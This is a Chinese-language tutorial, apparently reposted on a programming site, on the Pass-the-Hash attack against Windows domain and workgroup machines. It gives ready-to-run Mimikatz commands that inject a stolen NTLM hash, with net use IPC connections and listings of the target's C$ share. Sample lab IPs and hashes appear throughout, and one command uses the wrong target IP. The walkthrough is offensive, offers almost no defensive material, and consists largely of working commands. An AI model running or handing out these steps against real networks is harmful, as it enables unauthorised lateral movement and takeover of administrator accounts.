0

0

哈希传递(Pass The Hash)攻击与利用

星夢妙者

星夢妙者

发布时间:2025-09-25 09:01:21

|

453人浏览过

|

来源于php中文网

原创

哈希传递攻击详解

哈希传递攻击(Pass The Hash)是一种通过获取与账户相关的密码散列值(通常是 NTLM Hash)来实施的攻击方法。

在域环境中,用户通常使用域账号登录计算机。由于许多计算机在安装时使用相同的本地管理员账户密码,如果这些计算机的本地管理员账户和密码一致,攻击者便可利用哈希传递攻击方法登录内网中的其他计算机。

哈希传递攻击的优势在于,攻击者无需破解密码散列值来获取明文密码。

在 Windows Server 2012 R2 及之后版本的操作系统中,默认情况下内存中不会存储明文密码。因此,攻击者通常会使用工具将散列值传递到其他计算机中,进行权限验证,从而实现对远程计算机的控制。

哈希传递攻击的前提条件是拥有管理员的 NTLM Hash,并且目标机器的445端口处于开放状态。

在工作组环境中,Windows Vista 之前的机器可以使用本地管理员组内的用户进行攻击。而在 Windows Vista 之后的机器上,只有管理员(SID 为 500)的哈希值才可用于哈希传递攻击,其他用户(包括管理员用户但非管理员)将无法使用哈希传递攻击,并会提示拒绝访问。


使用 NTLM Hash 进行哈希传递

在域环境中,常用的工具是 Mimikatz。

首先,使用 Mimikatz 获取域管理员的 NTLM Hash:

administratorccef208c6485269c20db2cad21734fe7

哈希传递(Pass The Hash)攻击与利用

重要的是,在使用哈希传递时,需要以管理员权限运行 Mimikatz。假设我们已经获取了域管理员组内用户的 NTLM 哈希值。我们可以使用域内的一台主机通过 Mimikatz 对域内任何一台机器(包括域控)进行哈希传递攻击。执行命令后,会弹出 CMD 窗口,在该窗口中我们可以访问域内任何一台机器。条件是我们必须拥有域内任意一台主机的本地管理员权限和域管理员的 NTLM 哈希值。

攻击者:mary.god(域用户,具有管理员权限的 shell)

目标:god.administrator(域管理员)

目标 IP:192.168.3.21

首先,使用 Mimikatz 获取域管理员的 NTLM Hash:

god.orgadministratorccef208c6485269c20db2cad21734fe7

运行以下命令以弹出 CMD:

Remove.bg
Remove.bg

AI在线抠图软件,图片去除背景

下载
# 运行命令弹出 CMD
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7"
# 与域控建立 IPC
net use \\192.168.3.21
# 查看目标机器的 C 盘文件
dir \\192.168.3.21\c$

哈希传递(Pass The Hash)攻击与利用

在工作组环境中,同样使用 Mimikatz。

攻击者:mary(工作组,管理员权限)

目标:administrator(本地管理员)

目标 IP:192.168.3.31

首先,使用 Mimikatz 获取本地管理员的 NTLM Hash:

administrator518b98ad4178a53695dc997aa02d455c

哈希传递(Pass The Hash)攻击与利用

运行以下命令:

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:目标机器IP /ntlm:xxxxxx"
# 实例
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:192.168.3.31 /ntlm:518b98ad4178a53695dc997aa02d455c"
# 与本地管理员建立 IPC
net use \\192.168.3.21
# 查看目标机器的 C 盘文件
dir \\192.168.3.31\c$

哈希传递(Pass The Hash)攻击与利用

注意,有时在 dir 命令后面使用 IP 地址会提示用户名或密码错误,此时需要使用目标的主机名:

dir \\OWA2010CN-God\c$

哈希传递(Pass The Hash)攻击与利用

成功后,会自动弹出一个新的 shell,此时访问远程主机或服务无需提供明文密码。例如,我们列出了域控制器的 C 盘目录:

在进行哈希传递攻击时,需要注意以下几点:

  • dir 命令后面要使用主机名,不能使用 IP,否则会报错。
  • 使用 Mimikatz 进行哈希传递时,需要具有本地管理员权限。

参考文章:

https://www.php.cn/link/c980fea9ff9c4bb4b175e2708d05e417

相关专题

更多
java值传递和引用传递有什么区别
java值传递和引用传递有什么区别

java值传递和引用传递的区别:1、基本数据类型的传递;2、对象的传递;3、修改引用指向的情况。本专题为大家提供相关的文章、下载、课程内容,供大家免费下载体验。

108

2024.02.23

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

646

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1125

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

798

2023.08.01

windows查看端口被占用的情况
windows查看端口被占用的情况

windows查看端口被占用的情况的方法:1、使用Windows自带的资源监视器;2、使用命令提示符查看端口信息;3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容,供大家免费下载体验。

452

2023.08.02

windows无法访问共享电脑
windows无法访问共享电脑

在现代社会中,共享电脑是办公室和家庭的重要组成部分。然而,有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享,影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2350

2023.08.08

windows自动更新
windows自动更新

Windows操作系统的自动更新功能可以确保系统及时获取最新的补丁和安全更新,以提高系统的稳定性和安全性。然而,有时候我们可能希望暂时或永久地关闭Windows的自动更新功能。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

802

2023.08.10

windows boot manager
windows boot manager

windows boot manager无法开机的解决方法:1、系统文件损坏,使用Windows安装光盘或USB启动盘进入恢复环境,选择修复计算机,然后选择自动修复;2、引导顺序错误,进入恢复环境,选择命令提示符,输入命令"bootrec /fixboot"和"bootrec /fixmbr",然后重新启动计算机;3、硬件问题,使用硬盘检测工具进行扫描和修复;4、重装操作系统。本专题还提供其他解决

1552

2023.08.28

菜鸟裹裹入口以及教程汇总
菜鸟裹裹入口以及教程汇总

本专题整合了菜鸟裹裹入口地址及教程分享,阅读专题下面的文章了解更多详细内容。

0

2026.01.22

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
最新Python教程 从入门到精通
最新Python教程 从入门到精通

共4课时 | 12.7万人学习

Rust 教程
Rust 教程

共28课时 | 4.7万人学习

Kotlin 教程
Kotlin 教程

共23课时 | 2.8万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号